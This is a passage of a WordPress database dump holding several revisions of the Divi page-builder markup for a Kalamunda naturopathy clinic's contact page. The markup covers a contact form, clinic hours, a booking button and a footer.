use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"rgba(255,255,255,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" global_module=\"188\" saved_tabs=\"all\" locked=\"off\"][et_pb_row _builder_version=\"4.9.4\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" custom_margin=\"|||265px||\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"#ccd4c8\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\"><strong>Location</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda & online</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"][/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" button_icon_color=\"#000000\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\"><strong>Clinic Hours</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed: 9:30am-5:30pm</span><br /><span style=\"font-family: Montserrat;\">Thurs: 9:30am-7pm</span><br /><span style=\"font-family: Montserrat;\">Saturday: 9:30am-1pm</span></p>\n<p> </p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Contact','','inherit','closed','closed','','26-revision-v1','','','2025-04-01 20:39:52','2025-04-01 12:39:52','',26,'https://verdenaturopathy.com.au/?p=446',0,'revision','',0),(445,1,'2025-04-01 20:38:42','2025-04-01 12:38:42','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_enable_color=\"off\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" min_height=\"168px\" custom_margin=\"||60px|||\" custom_padding=\"||0px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22colorStart%22%93}\" colorStart=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\"][et_pb_row _builder_version=\"4.9.4\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"22px\" text_line_height=\"1.4em\" header_font=\"ZCOOL XiaoWei||||||||\" header_text_color=\"#a9804a\" header_font_size=\"80px\" text_orientation=\"center\" max_width=\"1090px\" module_alignment=\"center\" text_font_size_tablet=\"18px\" text_font_size_phone=\"16px\" text_font_size_last_edited=\"on|tablet\" text_line_height_tablet=\"\" text_line_height_phone=\"1.8em\" text_line_height_last_edited=\"on|phone\" header_font_size_tablet=\"48px\" header_font_size_phone=\"30px\" header_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h1 style=\"text-align: left;\"><span style=\"color: #000000; font-family: \'Playfair Display\';\">Get in touch.</span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact\" _builder_version=\"4.9.4\" background_color=\"rgba(0,0,0,0)\" min_height=\"723px\" custom_padding=\"0px|||||\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.9.4\" background_enable_color=\"off\" width=\"80.2%\" min_height=\"708px\" custom_margin=\"0px||||false|false\" custom_padding=\"0px|0px|||false|false\"][et_pb_column type=\"1_2\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" background_enable_image=\"off\" transform_translate=\"0px|-60px\" transform_translate_linked=\"off\" custom_padding=\"60px|30px|60px|30px|true|true\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_contact_form captcha=\"off\" email=\"hello@verdenaturopathy.com.au\" custom_message=\"Name: %%name%%||et_pb_line_break_holder||Email: %%email%%||et_pb_line_break_holder||Message: %%message%%\" success_message=\"Thanks for contacting us. We will be in touch soon.\" submit_button_text=\"Submit\" _builder_version=\"4.9.4\" form_field_background_color=\"#FFFFFF\" form_field_text_color=\"#000000\" form_field_custom_margin=\"||30px||false|false\" form_field_font=\"Montserrat||||||||\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"#FFFFFF\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" button_custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" border_width_all=\"2px\" border_color_all=\"#000000\" global_colors_info=\"{%22gcid-7ab3d862-4d0b-45ee-8ae5-ad938d511761%22:%91%93}\" form_field_background_color__hover_enabled=\"on|desktop\"][et_pb_contact_field field_id=\"name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"4.9.4\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"4.9.4\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.9.4\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.8em\" custom_margin=\"||17px|-2px||\" custom_padding=\"0px|||||\" inline_fonts=\"Montserrat,Playfair Display\" width=\"95.1%\"]<h3><span style=\"color: #000000;\"><span style=\"font-family: \'Playfair Display\';\"><a href=\"mailto:hello@verdenaturopathy.com.au\">hello@verdenaturopathy.com.au</a></span></span></h3>\n<p><span style=\"color: #000000;\"><span style=\"font-family: \'Playfair Display\';\"></span></span></p>\n<h3><span style=\"font-family: \'Playfair Display\'; font-size: x-large; color: #000000;\">Clinic hours:</span></h3>\n<h3></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">Tues/Wed: 9:30am-5:30pm<br /></span></span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">Thurs: 10am-7pm</span><br /><span style=\"font-family: Montserrat; color: #666666;\">Sat: 9:30am-1pm</span></span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\"></span></span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">Online consults available. Please get in touch if the above days/times are unsuitable.</span></span></h3>\n<p><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\"></span></span></p>\n<p><span style=\"font-family: \'Playfair Display\'; color: #000000; font-size: x-large;\">Clinic location:</span></p>\n<p><span style=\"font-family: Montserrat; font-size: large;\">Kalamunda (address given upon booking)</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"rgba(255,255,255,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" global_module=\"188\" saved_tabs=\"all\" locked=\"off\"][et_pb_row _builder_version=\"4.9.4\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" custom_margin=\"|||265px||\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"#ccd4c8\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\"><strong>Location</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda & online</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"][/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" button_icon_color=\"#000000\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\"><strong>Clinic Hours</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed: 9:30am-5:30pm</span><br /><span style=\"font-family: Montserrat;\">Thurs: 9:30am-7pm</span><br /><span style=\"font-family: Montserrat;\">Saturday: 9:30am-1pm</span></p>\n<p> </p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Contact','','inherit','closed','closed','','26-revision-v1','','','2025-04-01 20:38:42','2025-04-01 12:38:42','',26,'https://verdenaturopathy.com.au/?p=445',0,'revision','',0),(448,1,'2025-04-01 20:43:27','2025-04-01 12:43:27','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_enable_color=\"off\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" min_height=\"168px\" custom_margin=\"||60px|||\" custom_padding=\"||0px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22colorStart%22%93}\" colorStart=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\"][et_pb_row _builder_version=\"4.9.4\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"22px\" text_line_height=\"1.4em\" header_font=\"ZCOOL XiaoWei||||||||\" header_text_color=\"#a9804a\" header_font_size=\"80px\" text_orientation=\"center\" max_width=\"1090px\" module_alignment=\"center\" text_font_size_tablet=\"18px\" text_font_size_phone=\"16px\" text_font_size_last_edited=\"on|tablet\" text_line_height_tablet=\"\" text_line_height_phone=\"1.8em\" text_line_height_last_edited=\"on|phone\" header_font_size_tablet=\"48px\" header_font_size_phone=\"30px\" header_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h1 style=\"text-align: left;\"><span style=\"color: #000000; font-family: \'Playfair Display\';\">Get in touch.</span></h1>\n<p style=\"text-align: left;\"><span style=\"color: #000000;\">Email us at <a href=\"mailto:hello@verdenaturopathy.com.au\" style=\"color: #000000;\">hello@verdenaturopathy.com.au</a> or feel free to use the contact form below.</span><span style=\"color: #000000; font-family: \'Playfair Display\';\"></span></p>\n<p><span style=\"color: #000000; font-family: \'Playfair Display\';\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact\" _builder_version=\"4.9.4\" background_color=\"rgba(0,0,0,0)\" min_height=\"723px\" custom_padding=\"0px|||||\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.9.4\" background_enable_color=\"off\" width=\"80.2%\" min_height=\"708px\" custom_margin=\"0px||||false|false\" custom_padding=\"0px|0px|||false|false\"][et_pb_column type=\"1_2\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" background_enable_image=\"off\" transform_translate=\"0px|-60px\" transform_translate_linked=\"off\" custom_padding=\"60px|30px|60px|30px|true|true\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_contact_form captcha=\"off\" email=\"hello@verdenaturopathy.com.au\" custom_message=\"Name: %%name%%||et_pb_line_break_holder||Email: %%email%%||et_pb_line_break_holder||Message: %%message%%\" success_message=\"Thanks for contacting us. We will be in touch soon.\" submit_button_text=\"Submit\" _builder_version=\"4.9.4\" form_field_background_color=\"#FFFFFF\" form_field_text_color=\"#000000\" form_field_custom_margin=\"||30px||false|false\" form_field_font=\"Montserrat||||||||\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"#FFFFFF\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" button_custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" border_width_all=\"2px\" border_color_all=\"#000000\" global_colors_info=\"{%22gcid-7ab3d862-4d0b-45ee-8ae5-ad938d511761%22:%91%93}\" form_field_background_color__hover_enabled=\"on|desktop\"][et_pb_contact_field field_id=\"name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"4.9.4\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"4.9.4\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.9.4\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.8em\" width=\"95.7%\" custom_margin=\"||17px|-30px||\" custom_padding=\"0px|||0px||\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"color: #000000; font-family: \'Playfair Display\'; font-size: x-large;\">Clinic hours</span></h3>\n<h3></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">Tues/Wed: 9:30am-5:30pm<br /></span></span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">Thurs: 10am-7pm</span><br /><span style=\"font-family: Montserrat; color: #666666;\">Sat: 9:30am-1pm</span></span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\"></span></span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">Online consults available. Please get in touch if the above days/times are unsuitable.</span></span></h3>\n<p><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\"></span></span></p>\n<p><span style=\"font-family: \'Playfair Display\'; color: #000000; font-size: x-large;\">Clinic location</span></p>\n<p><span style=\"font-family: Montserrat; font-size: large;\">Kalamunda (address given upon booking). </span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"rgba(255,255,255,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" global_module=\"188\" saved_tabs=\"all\" locked=\"off\"][et_pb_row _builder_version=\"4.9.4\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" custom_margin=\"|||265px||\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"#ccd4c8\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\"><strong>Location</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda & online</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"][/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" button_icon_color=\"#000000\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" 